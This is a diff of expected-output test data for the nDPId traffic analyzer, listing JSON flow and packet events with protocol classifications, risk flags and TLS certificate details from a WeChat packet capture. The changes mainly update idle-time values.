+00643{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1401,"source":"wechat.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1492167640138,"flow_last_seen":1492167695550,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167822531,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54114,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} 
+00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1401,"source":"wechat.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1492167640138,"flow_last_seen":1492167695550,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167822531,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54114,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1401,"source":"wechat.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1492167648243,"flow_last_seen":1492167648277,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":495,"flow_tot_l4_payload_len":526,"flow_avg_l4_payload_len":263,"midstream":0,"thread_ts_msec":1492167822531,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":19041,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.QQ","breed":"Fun","category":"Chat"}} 00808{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1414,"source":"wechat.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1492167669545,"flow_last_seen":1492167669545,"flow_idle_time":180000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":0,"thread_ts_msec":1492167844485,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.255","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": 
{"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} -00796{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1414,"source":"wechat.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1492167648277,"flow_last_seen":1492167720406,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3430,"flow_tot_l4_payload_len":7446,"flow_avg_l4_payload_len":310,"midstream":0,"thread_ts_msec":1492167844485,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.158.34","src_port":43850,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.QQ","breed":"Fun","category":"Chat"}} -00684{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1414,"source":"wechat.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"finished","flow_packets_processed":36,"flow_first_seen":1492167695237,"flow_last_seen":1492167720429,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":12571,"flow_avg_l4_payload_len":349,"midstream":0,"thread_ts_msec":1492167844485,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54117,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} 
-00683{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1414,"source":"wechat.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1492167695488,"flow_last_seen":1492167720468,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":3531,"flow_avg_l4_payload_len":196,"midstream":0,"thread_ts_msec":1492167844485,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54118,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} +00796{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1414,"source":"wechat.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1492167648277,"flow_last_seen":1492167720406,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3430,"flow_tot_l4_payload_len":7446,"flow_avg_l4_payload_len":310,"midstream":0,"thread_ts_msec":1492167844485,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.158.34","src_port":43850,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.QQ","breed":"Fun","category":"Chat"}} 
+00684{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1414,"source":"wechat.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"finished","flow_packets_processed":36,"flow_first_seen":1492167695237,"flow_last_seen":1492167720429,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":12571,"flow_avg_l4_payload_len":349,"midstream":0,"thread_ts_msec":1492167844485,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54117,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} +00683{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1414,"source":"wechat.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1492167695488,"flow_last_seen":1492167720468,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":3531,"flow_avg_l4_payload_len":196,"midstream":0,"thread_ts_msec":1492167844485,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54118,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} 00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1414,"source":"wechat.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1492167650311,"flow_last_seen":1492167650345,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":192,"flow_tot_l4_payload_len":225,"flow_avg_l4_payload_len":112,"midstream":0,"thread_ts_msec":1492167844485,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":60562,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"}} 00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1414,"source":"wechat.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1492167650348,"flow_last_seen":1492167650467,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":3552,"flow_avg_l4_payload_len":355,"midstream":0,"thread_ts_msec":1492167844485,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"172.217.23.67","src_port":35601,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1416,"source":"wechat.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167848542,"flow_last_seen":1492167848542,"flow_idle_time":180000,"flow_min_l4_payload_len":201,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":201,"midstream":0,"thread_ts_msec":1492167848542,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.255","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
@@ -434,41 +434,41 @@ 00558{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1421,"source":"wechat.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167852023,"flow_last_seen":1492167852023,"flow_idle_time":120000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1492167852023,"l3_proto":"ip6","src_ip":"fe80::842:a3f3:a286:6c5b","dst_ip":"ff02::16","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3} 00532{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1421,"source":"wechat.pcap","alias":"nDPId-test","flow_id":72,"flow_packet_id":1,"flow_last_seen":1492167852023,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":110,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":62,"pkt_len":110,"pkt_l4_len":48,"thread_ts_msec":1492167852023,"pkt":"MzMAAAAWuHgu4toHht1gAAAAADgAAf6AAAAAAAAACEKj86KGbFv\/AgAAAAAAAAAAAAAAAAAWOgABAAUCAACPAPHlAAAAAgQAAAD\/AgAAAAAAAAAAAAL\/tFRbBAAAAP8CAAAAAAAAAAAAAf+GbFs="} 00619{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1421,"source":"wechat.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167852023,"flow_last_seen":1492167852023,"flow_idle_time":120000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1492167852023,"l3_proto":"ip6","src_ip":"fe80::842:a3f3:a286:6c5b","dst_ip":"ff02::16","l4_proto":"icmp6","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} 
-00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1426,"source":"wechat.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167865975,"flow_last_seen":1492167865975,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167865975,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58040,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1426,"source":"wechat.pcap","alias":"nDPId-test","flow_id":73,"flow_packet_id":1,"flow_last_seen":1492167865975,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167865975,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8cVZAAEAGp93AqAFny82Tq+K4AbvAQN+1AAAAAKACchCA5wAAAgQFtAQCCAoAMq7jAAAAAAEDAwc="} -00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1427,"source":"wechat.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167866226,"flow_last_seen":1492167866226,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167866226,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58041,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1427,"source":"wechat.pcap","alias":"nDPId-test","flow_id":74,"flow_packet_id":1,"flow_last_seen":1492167866226,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167866226,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8hOdAAEAGlEzAqAFny82Tq+K5AbuucSvFAAAAAKACchBGZwAAAgQFtAQCCAoAMq8iAAAAAAEDAwc="} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1428,"source":"wechat.pcap","alias":"nDPId-test","flow_id":73,"flow_packet_id":2,"flow_last_seen":1492167866243,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167866243,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAAC8GKZTLzZOrwKgBZwG74rhfZ1wawEDftqASN8iGUwAAAgQFoAQCCApFrzOuADKu4wEDAwc="} -00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1429,"source":"wechat.pcap","alias":"nDPId-test","flow_id":73,"flow_packet_id":3,"flow_last_seen":1492167866243,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167866243,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0cVdAAEAGp+TAqAFny82Tq+K4AbvAQN+2X2dcG4AQAOXrqwAAAQEICgAyryZFrzOu"} 
-00844{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1430,"source":"wechat.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167865975,"flow_last_seen":1492167866243,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167866243,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58040,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1431,"source":"wechat.pcap","alias":"nDPId-test","flow_id":74,"flow_packet_id":2,"flow_last_seen":1492167866495,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167866495,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAAC8GKZTLzZOrwKgBZwG74rl6NAw+rnErxqASN8iAowAAAgQFoAQCCApFrzPtADKvIgEDAwc="} -00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1432,"source":"wechat.pcap","alias":"nDPId-test","flow_id":74,"flow_packet_id":3,"flow_last_seen":1492167866495,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167866495,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0hOhAAEAGlFPAqAFny82Tq+K5AbuucSvGejQMP4AQAOXl+wAAAQEICgAyr2VFrzPt"} 
-00901{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1434,"source":"wechat.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167865975,"flow_last_seen":1492167866514,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1492167866514,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58040,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} -01435{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1436,"source":"wechat.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167865975,"flow_last_seen":1492167866514,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":3094,"flow_avg_l4_payload_len":386,"midstream":0,"thread_ts_msec":1492167866514,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58040,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} -00844{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1478,"source":"wechat.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167866226,"flow_last_seen":1492167871050,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1492167871050,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58041,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 
-00901{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1484,"source":"wechat.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167866226,"flow_last_seen":1492167871323,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":208,"midstream":0,"thread_ts_msec":1492167871323,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58041,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} -01436{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1486,"source":"wechat.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1492167866226,"flow_last_seen":1492167871323,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":3354,"flow_avg_l4_payload_len":335,"midstream":0,"thread_ts_msec":1492167871323,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58041,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} -00684{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1497,"source":"wechat.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"finished","flow_packets_processed":50,"flow_first_seen":1492167720101,"flow_last_seen":1492167748133,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2856,"flow_tot_l4_payload_len":27649,"flow_avg_l4_payload_len":552,"midstream":0,"thread_ts_msec":1492167872304,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54119,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} 
-00683{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1497,"source":"wechat.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1492167720353,"flow_last_seen":1492167748129,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":3531,"flow_avg_l4_payload_len":196,"midstream":0,"thread_ts_msec":1492167872304,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54120,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} -00683{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1513,"source":"wechat.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"finished","flow_packets_processed":26,"flow_first_seen":1492167765433,"flow_last_seen":1492167776953,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":9786,"flow_avg_l4_payload_len":376,"midstream":0,"thread_ts_msec":1492167897092,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58036,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} -00643{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1513,"source":"wechat.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167765657,"flow_last_seen":1492167777220,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167897092,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58037,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by 
IP"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}} -00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1513,"source":"wechat.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167765657,"flow_last_seen":1492167777220,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167897092,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58037,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1513,"source":"wechat.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167905310,"flow_last_seen":1492167905310,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167905310,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58042,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1513,"source":"wechat.pcap","alias":"nDPId-test","flow_id":75,"flow_packet_id":1,"flow_last_seen":1492167905310,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167905310,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8Y7pAAEAGtXnAqAFny82Tq+K6AbsLFrb3AAAAAKACchA4ZAAAAgQFtAQCCAoAMtVNAAAAAAEDAwc="} 
-00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1514,"source":"wechat.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167905561,"flow_last_seen":1492167905561,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167905561,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58043,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1514,"source":"wechat.pcap","alias":"nDPId-test","flow_id":76,"flow_packet_id":1,"flow_last_seen":1492167905561,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167905561,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8gtZAAEAGll3AqAFny82Tq+K7AbsB+ldaAAAAAKACchCg3QAAAgQFtAQCCAoAMtWMAAAAAAEDAwc="} 